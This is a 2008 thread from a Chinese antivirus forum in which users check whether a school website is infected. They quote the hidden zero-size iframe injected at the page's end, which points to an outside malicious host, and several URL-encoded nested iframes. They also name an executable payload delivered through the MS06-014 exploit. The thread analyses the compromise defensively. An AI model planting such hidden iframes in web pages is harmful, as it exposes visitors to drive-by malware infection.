瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 我学校这个网站真有病毒吗
JAY9394 - 2008-8-29 20:49:00
http://www.yjyizhi.com/ 会不会是误报....现在我瑞星版本是最新的

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MAXTHON 2.0)
粉碎星辰 - 2008-8-29 21:00:00
偶非常勇敢地点了进去
结果半天没出来
newcenturymoon - 2008-8-29 21:09:00
被挂马了 不要进了暂时 瑞星没误报
DXお琚仔 - 2008-8-29 21:12:00
钓鱼网站,不要进。瑞星真的没误报,KIS2009拦截了,是钓鱼网站
豪斯登堡新郎 - 2008-8-29 21:46:00


引用:
<iframe src=http://www.92bdd.com/xs/index.htm width=0 height=0></iframe>
超级游戏迷 - 2008-8-29 21:56:00
尾部挂马方式,截取该网站代码尾部内容:


引用:
  <area shape="rect" coords="13,11,167,44" href="student_2/index.html">
</map>
<map name="Map6">
  <area shape="rect" coords="10,8,158,42" href="2008jianzhang.htm">
</map>
<map name="Map8">
  <area shape="rect" coords="11,4,160,44" href="bm/bm3.asp">
  <area shape="rect" coords="149,34,153,38" href="#">
  <area shape="rect" coords="30,30,43,31" href="#">
  <area shape="rect" coords="151,35,153,45" href="#">
</map>
</body>
</html>

<iframe src=http://www.92bdd.com/xs/index.htm width=0 height=0></iframe>


最后一行红色代码即为网马。

如果对个别网站不信任,可以用附件这个工具查看网页代码,进行安全分析(我不太懂网页代码,就提供个工具吧):

附件: 网业代码查看器.rar
清风阁☆四少 - 2008-8-29 22:06:00
起至是尾部挂马,脑袋上还三个呢:default3:
清风阁☆四少 - 2008-8-29 22:10:00
请检测你的网站

1,扫描病毒木马
2,检查你的网站安全设置,权限等特别是网站目录的权限
3,检测你的网站是否存在端口漏洞,如果打开过多的端口很容易被中上灰鸽子
4,检测你的网站是否存在跨站攻击漏洞,尽快升级你的网站或更换网站程序
超级游戏迷 - 2008-8-29 22:10:00


引用:
原帖由 清风阁☆四少 于 2008-8-29 22:06:00 发表
起至是尾部挂马,脑袋上还三个呢:default3: 
那就麻烦楼上做个全面的分析吧:default6:
DoctorLc - 2008-8-29 22:23:00
IE7里的查看源文件不是也可以看代码吗?
清风阁☆四少 - 2008-8-29 22:33:00


引用:
原帖由 超级游戏迷 于 2008-8-29 22:10:00 发表


引用:
原帖由 清风阁☆四少 于 2008-8-29 22:06:00 发表
起至是尾部挂马,脑袋上还三个呢:default3: 
那就麻烦楼上做个全面的分析吧:default6:


如果真分析我就把它主页换了,以免害人!:default3:

上学网的人肯定多,而且木马网页第一链接位置也是一所学校,可能那个学校的网站只是一个肉鸡

在hxxp://www.92bdd.com/xs/index.htm(为了安全我把tt换成xx)

大家不要打开,里面是页面其实真正的木马不在这个页面


这个页面表面上是个IIS的错误信息,实际上是个挂马网页,这个人很动脑子

这个页面里有三个嵌套语句:
<iframe src="%68%61%70%70%79%31.%68%74%6D" width="0" height="0" border="0"></iframe>
<iframe src="%68%61%70%70%79%32.%68%74%6D" width="0" height="0" border="0"></iframe>
<iframe src="%68%61%70%70%79%33.%68%74%6D" width="0" height="0" border="0"></iframe>


%68%61%70%70%79%31.%68%74%6D翻译的结果是happy1.htm


分别是三个病毒页面

happy1.htm
happy2.htm
happy3.htm
清风阁☆四少 - 2008-8-29 22:34:00


引用:
原帖由 DoctorLc 于 2008-8-29 22:23:00 发表
IE7里的查看源文件不是也可以看代码吗?


你果然来自火星~
超级游戏迷 - 2008-8-29 22:38:00
11楼分析得不错,加点分吧……:default6:
清风阁☆四少 - 2008-8-29 22:41:00
我来着很早,你看我注册时间就知道,不过我喜欢的编程版块不见了,很可惜
我的帖子还在那里置顶了2年

不知道版主baohe老兄是否还在
超级游戏迷 - 2008-8-29 22:53:00


引用:
原帖由 清风阁☆四少 于 2008-8-29 22:41:00 发表
我来着很早,你看我注册时间就知道,不过我喜欢的编程版块不见了,很可惜
我的帖子还在那里置顶了2年

不知道版主baohe老兄是否还在

现在BAOHE都在埋头出精品,剑盟露面较多。:default2:

欢迎常来反病毒区指导……:default6:
Enao2005 - 2008-8-30 0:08:00


引用:
原帖由 清风阁☆四少 于 2008-8-29 22:33:00 发表


引用:
原帖由 超级游戏迷 于 2008-8-29 22:10:00 发表


引用:
原帖由 清风阁☆四少 于 2008-8-29 22:06:00 发表
起至是尾部挂马,脑袋上还三个呢:default3: 
那就麻烦楼上做个全面的分析吧:default6:


如果真分析我就把它主页换了,以免害人!:default

  <iframe src="%68%61%70%70%79%31.%68%74%6D" ></iframe>
  ttp://www.***.com/xs/yq.exe MS06-014
<iframe src="%68%61%70%70%79%32.%68%74%6D"
  ttp://www.***.com/xs/yq.exe MS06-014
<iframe src="%68%61%70%70%79%33.%68%74%6D"
  ttp://www.***.com/xs/yq.exe
3个挂马网站都用很复古的MS06-014:default21:

要是用IE查看源文件那就是打开挂马网页
清风阁☆四少 - 2008-8-30 8:58:00


引用:
原帖由 Enao2005 于 2008-8-30 0:08:00 发表


引用:
原帖由 清风阁☆四少 于 2008-8-29 22:33:00 发表
[quote] 原帖由 超级游戏迷 于 2008-8-29 22:10:00 发表
[quote] 原帖由 清风阁☆四少 于 2008-8-29 22:06:00 发表
起至是尾部挂马,脑袋上还三个呢:default3: 
那就麻烦楼上做个全面的分析


是查看源代码,不过是不用IE看的,是版主提供的工具
辛达星郁 - 2008-8-30 18:46:00
学习  :default7: :default7: :default7: :default7: :default7:
1
查看完整版本: 我学校这个网站真有病毒吗
© 2000 - 2026 Rising Corp. Ltd.